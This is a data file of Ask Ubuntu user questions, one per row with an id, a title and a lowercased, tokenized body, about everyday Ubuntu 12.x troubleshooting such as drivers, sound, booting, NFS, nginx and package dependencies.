244996	can not execute new installed program	my ubuntu is 12.04lts i was used apt-get to install opera and cowsay . i 've tried to execute them , but they all said ubuntu @ ubuntu : ~ $ cowsay bash : /usr/games/cowsay : permission denied ubuntu @ ubuntu : ~ $ opera-next bash : /usr/bin/opera-next : permission denied i 've already tried chmod a+x them but they wo n't work here is mount output ubuntu @ ubuntu : ~ $ mount sysfs on /sys type sysfs ( rw , nosuid , nodev , noexec , relatime ) proc on /proc type proc ( rw , nosuid , nodev , noexec , relatime ) udev on /dev type devtmpfs ( rw , relatime , size=1017476k , nr_inodes=214672 , mode=755 ) devpts on /dev/pts type devpts ( rw , nosuid , noexec , relatime , gid=5 , mode=620 , ptmxmode=000 ) tmpfs on /run type tmpfs ( rw , nosuid , relatime , size=410052k , mode=755 ) /dev/sdb1 on /cdrom type vfat ( rw , relatime , fmask=0022 , dmask=0022 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) /cow on / type overlayfs ( rw , relatime , lowerdir=//filesystem.squashfs , upperdir=/cow ) none on /sys/fs/fuse/connections type fusectl ( rw , relatime ) none on /sys/kernel/debug type debugfs ( rw , relatime ) none on /sys/kernel/security type securityfs ( rw , relatime ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev , relatime ) none on /run/lock type tmpfs ( rw , nosuid , nodev , noexec , relatime , size=5120k ) none on /run/shm type tmpfs ( rw , nosuid , nodev , relatime ) /.filesystems/usr/usr.sqfs on /.filesystems/usr/squash type squashfs ( ro , relatime ) aufs on /usr type aufs ( rw , relatime , si=f8757c62 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , nosuid , nodev , noexec , relatime ) gvfs-fuse-daemon on /home/ubuntu/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , relatime , user_id=999 , group_id=999 ) gvfs-fuse-daemon on /root/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , relatime , user_id=0 , group_id=0 ) and ls -l of these 2 file ubuntu @ ubuntu : ~ $ ls -l /usr/games/cowsay -rwxr-xr-x 1 root root 4421 dec 22 2010 /usr/games/cowsay ubuntu @ ubuntu : ~ $ ls -l /usr/bin/opera-next -rwxr-xr-x 1 root root 169 jan 17 22:44 /usr/bin/opera-next and cat of those file http : //pastebin.com/fp3miq6t ( they are to long so i post them here )
244997	hdmi input not recognized on asus n76	i have a brand new asus n76 with newly installed 12.10 . hdmi port is not recognized by ubuntu while working perfectly well with windows 8. xrandr does not even show as known connector : output of xrandr : screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 8192 x 8192 lvds1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 382mm x 215mm 1920x1080 60.0*+ 59.9 40.0 [ ... ] vga1 disconnected ( normal left inverted right x axis y axis ) any help is welcome .
244999	wine - spotify - audio configuration of wine	i 'm trying to run spotify on ubuntu using wine . i have followed the instructions on the spotify site and i was able to run spotify using wine . the only thing bothering me was that i ca n't configure the audio options as mentioned in the tutorial . when listening to a song i sometimes hear a small hickup/lag in the song . it is really annoying . the options that i have available : the options in the tutorial : can someone point out what is going wrong ? or any pointers how to deal with this ?
245006	problem with resolution after update ati driver !	after installing the amd-driver-installer-12.6-legacy-x86.x86_64.run on my ubuntu 12.10 laptop , my maximum resolution is 1024x768 . my gpu is ati radeon x1200 is integrated in my motherboard . i can see the up toolbar and the left toolbar with the 1024x768 resolution . and the compiz ca n't run .
245008	what is the `` right '' way to debianize software that uses the scons build-system ?	what specific tools are available , if any , or should we just use a fake makefile that runs scons ?
245010	workspace selector + mission control	is it possible to have something like the mac 's mission control but working for all the workspaces ? i mean : right now i can choose the workspace with < super > s and the windows inside a given workspace via < super > w . is it possible to combine the behavior of the two commands ? i wolud like to have a command , suppose < super > z , which shows me all the workspaces and all the windows inside the different workspaces . i have ubuntu 12.10 .
245014	google chrome not rendering kannada correctly ?	i am facing a problem in viewing web pages with kannada . i tried re-installing chrome but still have the problem .
245019	what alternatives for sticky notes are available ?	i like the sticky notes very much , they are always on the desktop . but in the current version of ubuntu ( 12.04 ) , i ca n't find it . other programs like gnotes & xjournal are not giving a feature to stay on the desktop . so , is there any application similar to the old sticky notes in ubuntu 12.04 ?
245020	is there a use for drafters in the development in the next releases of ubuntu ?	i am a current tech student at earnest pruett center of technology ( epcot ) for my second year and i would like to know if i can help in any way with my drafting and design skills to develop any physical aspect of ubuntu . i have been top of my class the last two years and the practice would be well appreciated if anyone knows anything that can be assisted by a 2nd year drafter . thank you for all of your help .
245021	aoc e950swn driver for ubuntu 12.04	i have a dell vostro 1700 laptop and the screen is failing . i know i can clone the screen on to an external vga monitor and i am looking at buying a aoc e950swn 18.5 '' monitor . however , before i buy it i want to make sure that ubuntu 12.04 will recognise/support this monitor . will it just plug and pray : - ) or will i have to do anything first . i would like to do this asap before my laptop screen dies totally . does any know the answer ? thanks chris .
245023	how do i delete ubuntu installed with windows system dual-boot ?	i have installed ubuntu alongside windows xp on a different partition and i want to delete ubuntu while retaining the windows xp . i do n't want that my windows gets damaged in the process . how can i do this ?
245028	asus touchscreen laptop linux . would it work ?	i got an asus touchscreen laptop with windows 8 pre-installed . if dual boot is a problem , can i just purge windows 8 , and make it a linux only system without sacrificing the touchscreen feature ?
245035	ubuntu 12.10 and amd radeon 13.1 driver	i have a inspiron 7520 , i have a i7 2.1ghz going up to 3.1 ghz . i also have an hybrid graphic card with a intel hd 4000 and a amd radeon hd 7730m 2go . my linux os is ubuntu 12.10 64 bits . my problem is pretty simple , i went to amd and downloaded the drivers for my gpu . the version is new , it is 13.1 . amd recommend me to use this driver for my card so it got ta be the right drivers for my card . also they are 64 bits and all . so i install it manually and use one of the tutorials we 've got on the internet for this specific type of card . i install the recommended packages from the tutorial sudo apt-get install build-essential cdbs fakeroot dh-make debhelper debconf libstdc++6 sudo apt-get install linux-headers-generic xserver-xorg-core libgcc1 sudo apt-get install dkms libqtgui4 wget execstack libelfg0 dh-modaliases and i install the 64 bit packages required : sudo apt-get install ia32-libs lib32gcc1 libc6-i386 cd /usr ; sudo ln -svt lib /usr/lib64 so then i unzip and all my drivers , make my .run executable , you know the thing you have to do to install the driver . every is installed , but during the installation i can see ; update-alternatives : using /usr/lib/fglrx/ld.so.conf to provide /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf ( x86_64-linux-gnu_gl_conf ) in auto mode update-alternatives : warning : forcing reinstallation of alternative /usr/lib/fglrx/ld.so.conf because link group x86_64-linux-gnu_gl_conf is broken update-alternatives : using /usr/lib/fglrx/alt_ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode update-initramfs : deferring update ( trigger activated ) well , after the installation you must generate your xorg.conf so i do the command ; sudo amdconfig -- initial -f and there what it says : amdconfig : no supported adapters detected also , i do n't know if it can be useful but i have installed the open source drivers i did once sudo apt-get install xserver-xorg-video-ati* i do n't have any ppa that could get a different open source driver , those are from ubuntu directly could it be the problem ? thank you very much for your help ! also what do i do if i have the file to run the driver but i ca n't install it the fast way because there are missing tools ?
245036	software center requires qt4 , i have qt 5	i have installed qtspim which depends upon qt4 . i have already installed qt5 on my system and qtspim is running fine . but when i go to software center it gives an error output of apt-get check qtspim : depends : qt4-dev-tools ( > = 4.7 ) but it is not installed depends : qt4-doc ( > = 4.7 ) but it is not installed i do n't want to install qt4 as i already have the latest version installed , is there any way around this ?
245041	how do i install chrome on a server ?	i 'm a complete newbie to ubuntu server and am looking for a web browser which i am learning to use as it is a requirement of the course i 'm doing . it 's been many a year since i 've spent any time poking around a cli and am constantly going back and forward between various websites for hints on coding . i 'm running this in vmware and it would make life a bit easier if i could find a decent web browser to use . i wo n't use firefox as i find it too unstable and do n't use it on my windows box ... i 've tried links2 and a couple of other light weight broswers but i 'm not keen . can any one give an idiots guide to what i need to do to set up chrome or something similar to run on ubuntu server .
245042	how to install a program from a .pkg file on ubuntu ?	i recently downloaded microsoft office visio and was planning on using wine to install it on my laptop running ubuntu 12.04 . but i ca n't access the .exe file .
245047	ubuntu root .bashrc file	i was installing rvm and for some reasons i changed first line on root 's .bashrc what was there ? i inserter if [ [ -n `` $ ps1 '' ] ] ; then and see that i 'm root , ca n't undo ... what string is first like if ... in ubuntu 12.04 for root ?
245048	why does software center report qt4 as unmet dependency , when i already have qt5 installed ?	i installed qtspim which requires qt4 to be installed . as i already have qt5 installed on my system , qtspim is working fine . however , software center reports dependency error . when i run apt-get check it gives : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : qtspim : depends : qt4-dev-tools ( > = 4.7 ) but it is not installed depends : qt4-doc ( > = 4.7 ) but it is not installed e : unmet dependencies . try using -f. i do n't want to install qt4 as i already have the latest version installed .
245051	wifi connection problem in hp pavillion g6	i have hp pavilion g6-2202tx and have installed ubuntu 12.10 alongside windows 8 ; but it does not connect to wifi inspite of being connected in windows 8 . please help me solve the problem .
245057	installing drivers from cd on ubuntu 12.10	i 've recently got a new pc & installed dual-boot win xp & ubuntu 12.10 i 've installed all the proprietory drivers from cd/dvd in windows ( on seperate partition ) but i 'm not sure how to go about doing this in ubuntu . i 've searched for info but have n't been able to make much sense of the other threads . i 'm very commandline inexperienced & new to installing stuff on ubuntu other than through software centre so any help would be appreciated . the dvd/cd drivers i have to install are : gigabyte amd 9/8/7-series utility dvd , club-3d graphics driver cd & tenda wireless network adapter driver .
245058	remove documents and pictures	is there a way to remove the 'documents ' and 'pictures ' options from my personal folders . i have a work machine that i need to upload some files from but do n't want to give that machine the option to access my personal documents and pictures .
245059	can ubuntu run on intel 's nuc devices ?	i was wondering if anyone has experience running ubuntu ( or any other linux ) on intel 's nuc computers ? i was not able to find any reports on linux running on this device , only windows 7/8 . update : and what about thunderbolt support in ubuntu/linux ? i have found some posts form may2012 mentioning problems . so , what is the state with thunderbolt nowdays ?
245062	i am unable to boot into ubuntu 12.10. no matching password file entry in /etc/shadow add user	i am unable to boot into ubuntu 12.10 . i have windows 7 installed as well . the grub seems fine . i can boot into windows . but when i boot into ubuntu , the following appears . `` no matching password file entry in /etc/shadow add user 'varun ' ''
245065	what are the most suitable distribution ubuntu for my computer ?	i 'm looking to migrate from windows xp to ubuntu and i would appreciate help in choosing the appropriate distribution . could someone outline the system requirements for the various flavours of ubuntu and perhaps other distributions of linux ? my personal computer specifications are : graphics : intel integrated graphics card processor : intel pentium 4 - 2 ghz ram : 1gb
245069	how to sync extension and theme in google-chrome	when i logged in to google chrome after installing . the extensions and theme doesnot sync . bookmarks are synced . how to make google-chrome sync both of them .
245072	nautilus freezes with increasing amount of files in hard drive	fresh installation of ubuntu 12.10 was working very fine . but after storing files in hard drive , nautilus freezes all the time and have to force quit everytime i close window whereas other applications are just working fine . nautilus freezes much more when the disk storage is higher . i 'm using toshiba satellite c665 .
245073	can not mount nfs from server on local network	i set up my nfs server without doing any bigger changes in configuration files . after that i added these entries to /etc/exports ( both paths are valid ) on server ( 192.168.1.11 ) : /export 192.168.1.0/192.168.255.255 ( rw , fsid=0 , insecure , no_subtree_check , async ) /export/users 192.168.1.0/192.168.255.255 ( rw , nohide , insecure , no_subtree_check , async ) then i restarted the computer and i tried to get exports list : $ showmount -e 192.168.1.11 /export 192.168.1.0/192.168.255.255 /export/users 192.168.1.0/192.168.255.255 according to this output there 's not problem with connection . now i want to mount /export to client filesystem ( 192.168.1.12 ) : sudo mount -t nfs4 192.168.1.11 : /export /mnt after typing this there 's no output and i ca n't do anything . another terminal line start is not being displayed . command is stuck . does anybody know am i doing wrong ? please help me .
245074	can not unmute sound in 12.04	i have no sound in ubuntu 12.04 . the sound icon on the top line is off ( muted ) . clicking on system settings and then sounds , just locks up the system settings until i shut down . i tried to watch a youtube video to check the sound but it freezes up the video . anything to do with sound just locks up . i added an older soundblaster live card that works in windows but ubuntu still behaves the same way . i am using a msi fm2-a75ma motherboard with a amd a8 5600 apu . i phoned msi and they say that they do n't support linux .
245075	ubuntu 12.04 booting issues	i am almost on the verge of tears : ( though not a techie , did contribute towards translating ubuntu help ... once upon a time , when i had the free time have been a great fan and propagator of ubuntu for the last 8 years ! presently running/using ubuntu 12.04 today i accepted the automatic updates however , instead of restarting the computer i just used the normal shutdown as i was running short of time back from office - i start the computer only to get the 'grub ' prompt i am at a total loss of what to do and backup/restore my files booted thru the 'live ' disk ... but still unable to access files from the computer hdd as it says that i do not have permissions to read those files : ( please please help me else after this catastrophe i am at a total loss , as to which os to trust ! ! ! thanks & regards sumit d garg india
245081	12.10 nb=amd690g gfx=ati-x1250 graphics driver problem	i used to have a discrete graphics card , but then i decided to rely on the integrated graphics chip to decrease power consumption as i only use the computer for browsing/thunderbird/torrent/hd clips . the nvidia card ( discrete ) was detected as unknown , and so is my ati x1250 integrated graphics chip ... how can i make sure that xserver-xorg-video-radeon is being utilized and edit its settings or fiddle with it ? unity after a while become slow and needs a restart to return to normal pace ... and my hd videos are not as snappy ( lower frame rate ) . i know this is not a hardware capability problem because windows was playing nicely ... and i do n't want to go to windows..i fell in love with ubuntu . desktop pc m2a-vm am2+ socket amd 5000+ dual core 3gb ram 3tb storage
245084	ubuntu 12.04 & nvidia 304 causes two gnome-panel	i just upgraded from nvidia-curent to the 304 experimental so that i could install steam . the 304 package is working just as well as the current driver on my setup except that when i log in i get two instances of gnome-panel on my primary monitor ! its really odd as my settings are the same as they where in the current driver . ( twinview , absolute positioning on main monitor , 2nd is left of it ) and i saved the xorg.conf over the old one instead of appending to it . any way to only get one instance of gnome-panel ?
245086	ca n't key in password in terminal	i typed in the following command in terminal . `` sudo apt-get install ubuntu-restricted-extras '' i press enter and i am asked for a password . i type in the password but nothing shows up on the screen , and the white cursor box does n't move . how do i fix this problem . thank you
245094	rhythmbox not saving imported files & other issues	i 've recently changed pc & transferred my music folders over , but i 've got noticed some issues with rhythmbox ( using ubuntu 12.10 ) : 1 ) when music is imported where is it saved ? i imported music from an external hdd to rhythmbox & want it all to be saved in artist/album folders in 'music ' but ca n't get it to do so . files show up in rhythmbox but i do n't know where they 're saved to . i 'm doubtful if the import is permanent too as i 'd imported previously but when i logged on today rhythmbox was empty . 2 ) i 've tried to set preferences > music > music location as the 'music ' folder i want but it keeps showing 'multiple locations set ' . how do i change this & ensure imported files/folders are saved where i want 3 ) i 've got plugins enabled for album art getting but ca n't see how to get this to work ? 4 ) trying to answer the above i went to the rhythembox site & saw http : //projects.gnome.org/rhythmbox/screenshots/rhythmbox-visualization.png ca n't see any way to set up visualizations on rhythembox but it looks cool so i 'd like to know how . 5 ) i now find that i 've got some files on my ipod i do n't have in my external hdd music folder as for some reason importing these into rhythmbox previously did n't save them - will i be able to transfer from ipod to rhythembox save them in my main music folder ? i realise its a lot of questions but i 'd appreciate any help you can give .
245096	adding nodes to maas	edit : the wiki page has been updated with the info . this has been resolved *updated link : https : //wiki.ubuntu.com/serverteam/maas/avahiboot ? action=recall & rev=2* i 've been trying to add a node to my new maas server for quite a bit of time now . i installed maas on the master node using the ubuntu server install disk , then booted that same disk on one of my nodes , and chose my maas server when it came up in the install . the computer shut down , and it 's name appeared in the main maas control panel ( 192.168.0.22/maas ) . i clicked on the node name , and clicked on `` accept & commission '' . a blue message box poped up , and said node commissioning started - you can boot this node using avahi-enabled boot media or an adequately configured dhcp server . see https : //wiki.ubuntu.com/serverteam/maas/avahiboot for instructions. '' . that link , which is supposed to help me , just gives me a wiki page saying '' this page does not exist yet . you can create a new empty page , or use one of the page templates. '' . so what am i supposed to do next ? i have searched up avahiboot on google , but it just gave me people who were getting error reports after using this avahi . i have looked around askubuntu.com , but i did n't find anything that gave me an answer . i am using ubuntu server 12.10 quantal quetzal . edit : also , on the main maas page , it tells me that there is 1 node in the cluster , but that it is offline .
245097	ubuntu server : login with new created user > get dollar shell	when i create a new user in ubuntu server and then try to login with the new user i get an error message . in one case ubuntu tells me that the home directory of the user does n't exist when i login and ubuntu then shows me a dollar shell . in the other case , when i create a home folder for the user , ubuntu just shows me a dollar shell when i log in with the user . i use : useradd name . i thought the home directory was automatically created when creating a user . can anyone help me ?
245099	how can i boot into windows after i set ubuntu as the default operating system ? ( i 'm using wubi )	i followed this guide here to set the default operating system at boot-up to ubuntu . since i installed ubuntu using wubi , it involved setting the default operating system of the windows boot-looader using some preference settings on windows . now i have locked myself out of booting into windows at all . i can not use f12 , f8 or anything to get windows to boot . does anyone have a guide to boot into windows so i can change the option back to choose what operating system i want to boot ?
245103	launcher hides and when cursor is touching the edge	i 've been using ubuntu ( and mint ) for almost two years ( since ubuntu 11.04 to be exact ) , and yesterday i decided to try some compiz effects for a first time , never actually bothered about that . everything is fine now , i have enabled 3d cube , left click on bottom edge activates it . also , i 've enabled wobbly windows and water effect . but , here is my problem : since i enabled cube , my unity launcher just hides back again one second after it 's activated . basically , as always i push cursor to the left edge of my screen , and if i keep on holding it on the edge it just hides back again . if i after it 's revealed move cursor to the right over the icons it stays until i click . sometimes this is very annoying because i have ~30 icons in launcher and when i start scrolling down they just hide ... i really hope you know what i 'm talking about , maybe there is a obvious way to solve this but i did n't see it haha .
245104	empathy does n't integrate with messaging menu ?	even if empathy is running , it does n't have a grey arrow in the messaging menu . chat statuses ( available , busy , etc . ) also do n't work in the menu and are stuck to `` offline '' . i use 12.10 quantal quetzal .
245106	how can i connect from ubuntu 12.10 to file shares on a windows 8 system using a microsoft id for login ?	windows 8 works better when login is done with a microsoft id ( aka windows live id ) . however when i try to establish a network file sharing connection from ubuntu 12.10 , the username ( which is an email address like foobar @ outlook.com ) and password for that id are not accepted .
245112	can i disable full-disk encryption ?	i recently installed ubuntu 12.10 and it requires a passphrase to boot up ( i installed it with an encrypted file system ) . do i have to reinstall to change to a standard unencrypted file system ?
245113	simple scan - changing the default output file type to pdf and improving compression ?	is there a way to change the default output file type in the 'simple scan ' software provided with ubuntu 12.10 to be a pdf rather than a jpeg ? and is it possible to modify the compression settings on the pdfs that simple scan outputs to be higher and so produce smaller file sizes ? background : i use simple scan on ubuntu 12.10 to scan multiple receipts to prepare for the tax season . i scan many hundreds of receipts at a time , so this is a very repetitive task . issue 1 : every time i scan a new document using simple scan , the software defaults the file format to jpeg , meaning that i need to change the output format from jpeg to pdf per scan . this is very repetitive and precisely the sort of user preference that ubuntu is usually so good at accommodating via gconf or dconf settings , or other tweak tools . issue 2 : i need to store my scans in pdf format with a high level of file compression . the output quality of the pdfs that are generated by simple scan is very high , meaning that the files that are output are too large to be emailed in bulk . i typically use an external script to later compress multiple pdfs in bulk but this can get messy and so i 'd like to improve my workflow . any ideas please ? thanks in advance .
245114	windows 8 laptop keeps alternating between the windows 8 bootloader and grub2	i have a toshiba portege z935 with windows 8 pre-installed . i installed ubuntu 12.10 with an efi boot partition . when i turn my computer on , it will boot into grub2 and i can access both operating systems properly . if i restart the computer again it will show the windows 8 bootloader and give me the option of booting into windows 8 or ubuntu . the windows 8 option works properly but when i try to log into ubuntu , it gives an error pointing to the file name \nst\autoneogrub0.mbr and says it ca n't find a required file . once i go into windows 8 and the restart the computer , it switches to grub2 again . in this same way every time i boot the computer it keeps alternating between grub2 and the windows 8 loader comes up . i 'm trying to find a way to either get grub 2 to launch all the time , or at least get the ubuntu entry in the windows 8 loader to work properly . any help would be greatly appreciated .
245117	usb hard drive does not get automatically mounted , and the icon does n't appear in the launcher	a usb flash drive is detected as expected and appears in the unity sidebar . it mounts under /media/john , with john being my username . however , a usb hard drive does not show in the launcher . the only way to access the drive is by doing a manual mount via terminal . this wo n't be a good solution for the end user , who is not very computer literate .
245118	is there a ubuntu version of mega [ mega.co.nz ] client ?	the new mega provides much more free space than dropbox or other competitors and last but not least privacy finally arrived to the world of cloud storages . if there is no client then is it possible to use some synchronization software to sync my folders with mega ?
245119	hp probook 4540s ( c4z14ea ) problems with wireless	i have hp probook 4540s ( c4z14ea ) . but i ca n't use wireless . and i ca n't find driver for wlan . how can i resolve this problem ?
245121	what mame ui frontends are available for ubuntu 12.10 ?	i have installed mame via sdlmame but have so far failed to successfully install any decent gui that enables categorisation of games , favouriting , or preview screenshots . i have many hundreds of roms . gnome video arcade will not read my roms from an external hard drive , even when they have been configured correctly in ~/.mame/mame.ini lightning looks interesting but crashes when trying to build a database of my roms qmc2 fails to install due to missing dependencies gmameui also fails to install on ubuntu 12.10 any guidance appreciated ! thanks
245125	pc keeps stuck at ubuntu install	i am trying to install ubuntu on an old toshiba pc ( hdd totally formatted ) from dvd but install stops after a few minutes and stays stuck . what did i miss ? partitioning hdd or something else ?
245128	need to run a .sh as root on boot or login	still new with linux and running ubuntu 12.10 i have a wireless stick ( ae2500 ) which has known issues that has been partially solved using ndiswrapper . however , to use it i must run the same scripts every time i reboot , effectively uninstalling and reinstalling the driver . i made a .sh file to run every time to make it easy , but i must do the sudo login everytime . there are three solutions i am looking for and although not all are necessary to solve this particular problem , i would still like to know them all for learning purposes . run scripts or file.sh on boot ( as well as other programs ) run scripts or file.sh automatically with root privileges make the install permanent so as not to have to go through the process every time . any additional information that can help me regarding this that i did not think to ask ( including streamlining my commands ) , or general knowledge , would be greatly appreciated . following are the contents of the file . i pretty much just made it as i would have entered it . cd ~/ndiswrapper-1.58rc1 sudo modprobe -rf ndiswrapper sudo rm /etc/modprobe.d/ndiswrapper.conf sudo rm -r /etc/ndiswrapper/* sudo depmod -a sudo make uninstall sudo make sudo make install sudo ndiswrapper -i bcmwlhigh5.inf ndiswrapper -l sudo modprobe ndiswrapper
245130	how to set up a network printer . ( shared with windows )	i have a freshly installed ubuntu 12.04lts and i wanted to use it to share an offline ( wired ) printer that is connected to the machine running ubuntu . i wanted to be able to print to this printer from both other ubuntu machines as well as windows 7 machine . i am a newbie thus i do n't really know how to do this , before i used to use google cloud print but i wanted more `` local '' method . how could i accomplish that over a wifi network ? thank you .
245139	tried everything , but still no sound in ubuntu 12.04	i have tried killing pulseaudio . i have tried editing alsa-base.conf . i have tried alsamixer . i have tried uninstalling and reinstalling alsa-base and pulseaudio . i have tried everything i could find , but still no sound . my computer is an hp pavilion dv6 6190us with switchable amd and intel graphics . the sound stopped working suddenly after an update . pavucontrol shows that i am outputting audio in that progress-bar sort of thing , but i ca n't hear anything . even headphones/external speakers do n't work . i can change volume using my volume keys , but nothing happens . please help . i am a linux noob , so please tell me if you need more information and how to get it . update : solved : for some reason , a suspend and resume cycle fixed the problem . i do , however , thank whoever answered anyway .
245140	does the order of kernel parameters matter when adding acpi_backlight=vendor ?	i am running 12.10 on an hp dv7-6197ca . i had fan issues which i was able to correct by changing this line in grub ; grub_cmdline_linux_default= '' quiet splash '' to : grub_cmdline_linux_default= '' quiet splash pcie_aspm=force '' so i have read that if i change that line to include acpi_backlight=vendor i will be able to adjust brightness , something i currently can not do . what i am wondering is can i still leave the pcie_aspm=force in the line ? and should it be before or after acpi_backlight parameter ? any help is greatly appreciated !
245141	cant shut down x-windows with out system hanging	i need to install my video drivers , in order to do so i have to shut down x-windows , but it hangs every time and will not go all the way out to prompt . i 'm using sudo init 1 i used a couple of other commands as well for this purpose with the same problem . any ideas ? running 12.10 64bit
245147	how to install ubuntu on computer with no operating system ?	we have a toshiba satellite a305-s6872 , we took out the old hard drive , and put in a new one . we downloaded the ubuntu iso , and put it on a dvd . now , when we try to boot from the dvd , nothing shows up . what should we do . thanks , thomas
245148	jamendo works in firefox but not in chromium	when i try to play a track on jamendo.com , it does not work in chromium . in firefox it does . the player seems not to use flash , but i 'm not sure ( i have no web-dev experience ) . anyway , flash is installed and works in firefox and chromium . i even reinstalled ( purged and installed ) flash to be sure . what exactly happens : i click on the play button beside a track or in the player . the play icon changes to a pause button for not even a second , then changes back to a play button . nothing happens , no sound or something . i have this problem since autumn or so . i think i had it on another website once , but i do n't remember it . at first i thought it 's something with html5 , because the front end of the web player seems not to be flash . but the soundcloud web player also has a non flash front end , but it works for me . so i have this problem currently only on jamendo using chromium . os : ubuntu 12.10 chromium-version : 23.0.1271.97 ( entwickler-build 23.0.1271.97-0ubuntu0.12.10.1 ) blockers : ad block plus ( diabling it does not help ) i tried disabling all plugins but it did not help . i noticed something though : i am accepting all cookies and data , but when i 'm on jamendo or askubuntu or youtube , there shows a cookie icon in the address bar that indicates that the website is allowed to set cookies ( according to my settings everyone is ) , but it was unable to set some of them . i 'm not sure whether this has to say something though , since youtube and askubuntu and soundcloud work fine . can you tell me why it does not work , how i can fix it ? and whats the technical difference to soundcloud causing it to work ? thanks .
245154	how to get permissions to compile a c program from ntfs hard drive ?	i have this problem : i 'm used to compile and run .c files with codeblocks . if i do that from my desktop ( ext partition ) it works without problems , but doing this from my secondary hard drive ( ntfs partition ) makes codeblocks to say permission denied while running a .c file . i have read it 's because of the partition type is it correct ? but i do n't know how to solve it . i tried to editsudo gedit /etc/fstab adding this line : /dev/sda /media/dati ntfs user , exec 0 1 but after rebooting ubuntu i had a warning on boot about a problem mounting a drive , that 's because i set kde to auto mount my dati drive on boot . so i should auto mount my ntfs drive with execute permission ? how can i do that ?
245155	contributing to the package or the upstream branch ?	while learning about ubuntu development & packaging , there 's one part that 's not quite clear to me . so , let 's say we 're in the middle of active development ( e.g . raring ) before feature freeze and i want to work on improving a program packaged for ubuntu - e.g . guake . i would like to fix a bug , add a new feature etc . now , i see two ways of doing this : working on the upstream trunk lp : guake , submitting a merge proposal and requesting the package maintainer for ubuntu to resync the package working on the package branch ubuntu : guake , submitting my fix there and letting the project or package maintainer worry about forwarding this fix upstream or creating a guake-ubuntu0 patched version for the package repo is one of these two approaches better ? does it depend on the situation ( e.g . type of contribution - bug fix or a new feature ; development phase ) and if so , how ? it would be great if someone experienced could give some more guidelines and advice on this topic . when working in the github ecosystem , it always seems very clear - everything is centered around the latest development version and all pull requests are submitted for it ( at least i never bumped into anybody submitting stuff for some old version 0.7 of project x ) , while on launchpad this disparity between package and upstream branches kind of confuses me . i 'm not sure if it 's better to run the latest ubuntu development build and dig into the source that 's available there ( through apt-get source < package > ) or should i just get the latest trunk code into my stable ubuntu , make the change and see if i can somehow get maintainers to forward this change towards the package ( resyncing , checking if the builds still work against other ubuntu libraries etc . ) i read both the old and the new packaging guides , but it still left me puzzling about these questions .
245156	ubuntu 11.10 nginx and fastcgi-php not working	i have nginx successfully running on my home server . i dont have a .com specified because it is just a trial run until i get everything figured out . i can navigate to the server ip address and the index.html is served fine . i try to navigate to the test.php and it tells me `` no input file specified '' here is me nginx.conf : user www-data ; worker_processes 4 ; pid /run/nginx.pid ; events { worker_connections 768 ; # multi_accept on ; } http { # # # basic settings # # server { # php/fastcgi listen 80 ; server_name localhost ; root /var/www ; location = /favicon.ico { empty_gif ; # return 204 ; } location ~ \.php $ { root /var/www ; fastcgi_pass 127.0.0.1:9000 ; } } sendfile on ; tcp_nopush on ; tcp_nodelay on ; keepalive_timeout 65 ; types_hash_max_size 2048 ; # server_tokens off ; # server_names_hash_bucket_size 64 ; # server_name_in_redirect off ; include /etc/nginx/mime.types ; default_type application/octet-stream ; # # # logging settings # # access_log /var/log/nginx/access.log ; error_log /var/log/nginx/error.log ; # # # gzip settings # # gzip on ; gzip_disable `` msie6 '' ; # gzip_vary on ; # gzip_proxied any ; # gzip_comp_level 6 ; # gzip_buffers 16 8k ; # gzip_http_version 1.1 ; # gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript ; # # # nginx-naxsi config # # # uncomment it if you installed nginx-naxsi # # # include /etc/nginx/naxsi_core.rules ; # # # nginx-passenger config # # # uncomment it if you installed nginx-passenger # # # passenger_root /usr ; # passenger_ruby /usr/bin/ruby ; # # # virtual host configs # # upstream php5 { server unix : /tmp/php-fastcgi.sock ; } include /etc/nginx/conf.d/*.conf ; include /etc/nginx/sites-enabled/* ; # include /var/www/* ; } # mail { # # see sample authentication script at : # # http : //wiki.nginx.org/imapauthenticatewithapachephpscript # # # auth_http localhost/auth.php ; # # pop3_capabilities `` top '' `` user '' ; # # imap_capabilities `` imap4rev1 '' `` uidplus '' ; # # server { # listen localhost:110 ; # protocol pop3 ; # proxy on ; # } # # server { # listen localhost:143 ; # protocol imap ; # proxy on ; # } # }
245157	how to make a bootable iatkos usb on ubuntu 12.10 ?	hi guys i am trying to create a dual boot installation on my laptop with iatkos and ubuntu . the problem with iatkos ml2 is that i need an apple computer to create the iatkos bootable usb . i searched on google and i was wondering if i could create the usb from ubuntu . thanks in advance ! ! ! btw i am using ubuntu 12.10 and i have hp dv6 laptop
245161	can not remove c : /ubuntu folder	i recently installed windows 8 and then tried installing ubuntu 12.10 using windows installer . it just did not install . i removed it from the control panel- add or remove programs . still , there was a c : /ubuntu folder . i could simply not delete it . it is taking so much of my space . i tried shift delete , tuneup shredder , rmdir from command prompt but still the file in the c : /ubuntu/disks folder keeps reappearing after delete . i tried to install ubuntu again but it just would not . there was a similar post ( which is now closed in ubuntu-god knows why as it is very much relevant still ) which suggested using lockhunter to rename the folder..i renamed it to ubuntujunk . while , my cd boot helper is getting installed and hopefully i will be able to install ubuntu 12.04 ( now left 12.10 ) , what will happen to my ubuntujunk folder ... its taking up valuable space ... 5 gb or more . pls help .
245164	what daemon torrent clients are available on ubuntu ?	i 'm looking for a daemon torrent client for my server , which is running ubuntu 12.04 . i want to be able to connect to this client from my laptop , which is also running ubuntu 12.04 , preferably with a gui , but a cli interface would be ok too . what daemon torrent clients are available on ubuntu ?
